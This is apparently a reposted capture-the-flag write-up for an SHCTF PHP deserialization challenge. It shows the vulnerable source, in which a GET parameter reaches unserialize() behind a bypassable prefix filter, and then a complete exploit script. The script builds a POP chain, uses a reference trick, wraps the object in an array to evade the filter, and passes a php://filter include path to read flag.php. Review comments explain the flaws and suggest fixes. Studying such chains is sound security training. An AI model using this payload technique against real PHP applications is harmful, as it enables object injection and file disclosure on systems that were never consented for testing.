
SHCTF

时间:2023-11-14 19:45:47浏览次数:18  

serialize

 <?php
// Prints this script's own source into the response, so every class and the
// check() filter defined below are visible to whoever requests the page.
highlight_file(__FILE__);
/**
 * Holder class whose __get() magic method has side effects.
 *
 * All three properties are public and therefore fully controlled by whatever
 * data is fed to unserialize(). The class is dangerous only in combination
 * with that: __get() fires on any read of a property this class does not
 * declare, and it ends by printing $a.
 */
class misca{
    public $gao;
    public $fei;
    public $a;
    /**
     * Invoked by PHP when an undeclared/inaccessible property is read.
     *
     * Statement order matters here:
     *   1. miaomiao() overwrites $a with a fixed string;
     *   2. $gao is then assigned from $fei;
     *   3. $a is handed to die().
     * If the deserialized data makes $gao a PHP reference to $a, step 2 also
     * replaces $a, so step 1 does not guarantee what step 3 prints.
     *
     * @param string $key name of the property that was read (unused)
     */
    public function __get($key){
        $this->miaomiao();
        // Plain assignment, but it writes through any reference bound to $gao.
        $this->gao=$this->fei;
        // die() prints a non-integer argument; an object here is cast to
        // string, which invokes that object's __toString().
        die($this->a);
    }
    /** Sets $a to the constant greeting string. */
    public function miaomiao(){
        $this->a='Mikey Mouse~';
    }
}
/**
 * Entry point of the chain: __wakeup() runs automatically as soon as
 * unserialize() rebuilds an instance of this class.
 */
class musca{
    public $ding;
    public $dong;
    /**
     * Reads the `dong` property of whatever object $ding holds.
     *
     * $ding comes from the serialized input. If it is an object that does not
     * declare `dong`, this read triggers that object's __get().
     */
    public function __wakeup(){
        return $this->ding->dong;
    }
}
/**
 * Sink of the chain: string conversion of this object includes a file whose
 * path is taken from a public, deserialization-controlled property.
 */
class milaoshu{
    public $v;
    /**
     * PHP method names are case-insensitive, so this is __toString().
     *
     * NOTE(review): include() on $this->v accepts any local path or stream
     * wrapper URL the PHP configuration allows. Outside a CTF, a path that
     * can originate from unserialize() input must never reach include; use a
     * fixed allowlist of files instead.
     * No string is returned, but include() has already executed by the time
     * PHP reports the missing return value.
     */
    public function __tostring(){
        echo"misca~musca~milaoshu~~~";
        include($this->v);
    }
}
/**
 * Prefix filter applied to the request value before it is unserialized.
 *
 * Terminates the script when $data begins with the serialized-object token
 * `O:<digits>`; any other input is returned unchanged.
 *
 * NOTE(review): this is a denylist on the first bytes only. Objects nested
 * inside another serialized value (for example an array element) do not start
 * with that token, so the filter does not limit which classes unserialize()
 * will instantiate. Filtering serialized text is not a reliable control:
 * decode request data with json_decode(), or call unserialize() with
 * ['allowed_classes' => false].
 *
 * @param string $data raw serialized string from the request
 * @return string the same string, when it does not start with `O:<digits>`
 */
function check($data){
    $startsWithObjectToken = preg_match('/^O:\d+/', $data);
    if (!$startsWithObjectToken) {
        return $data;
    }
    die("you should think harder!");
}
// NOTE(review): a GET parameter flows into unserialize() with only check() in
// between. Every class loaded in this script is instantiable from the request,
// and __wakeup() runs during the call. Production code should not unserialize
// request data at all (use json_decode()), or should pass
// ['allowed_classes' => false] as the second argument.
unserialize(check($_GET["wanna_fl.ag"])); 

exp:

 <?php
// Property-only stub: same class name and public properties as the target's
// misca, with no methods, so serialize() emits matching names and nothing in
// this script runs the target's magic methods locally.
class misca{
    public $gao;
    public $fei;
    public $a;
 
}
// Property-only stub mirroring the target's musca (the class whose __wakeup()
// runs on the server side when the data is unserialized).
class musca{
    public $ding;
    public $dong;

}
// Property-only stub mirroring the target's milaoshu; only $v is carried in
// the serialized output.
class milaoshu{
    public $v;

}

// Object graph: musca -> ding: misca -> fei: milaoshu.
// On the target, musca::__wakeup() reads ding->dong; misca declares no `dong`,
// so misca::__get() runs.
$c=new musca();
$c->ding=new misca();
$c->ding->fei=new milaoshu();
// Binds gao as a reference to a on the same misca object. serialize() keeps
// the reference, so the target's `$this->gao=$this->fei` also overwrites $a
// after miaomiao() has set it, and die($this->a) then string-casts the
// milaoshu object.
$c->ding->gao = &($c->ding)-> a;
// Path consumed by include() in milaoshu::__tostring(). The base64-encode
// filter makes the file's bytes come out encoded rather than run as PHP.
// Defender's view: a `php://` wrapper string inside a serialized request value
// is a strong signal worth alerting on.
$c->ding->fei->v="php://filter/convert.base64-encode/resource=flag.php";
// Wrapped in an array, so the output starts with `a:` and not the `O:<digits>`
// prefix that check() rejects.
echo serialize(array($c));
?>

 

From: https://www.cnblogs.com/kode00/p/17780458.html
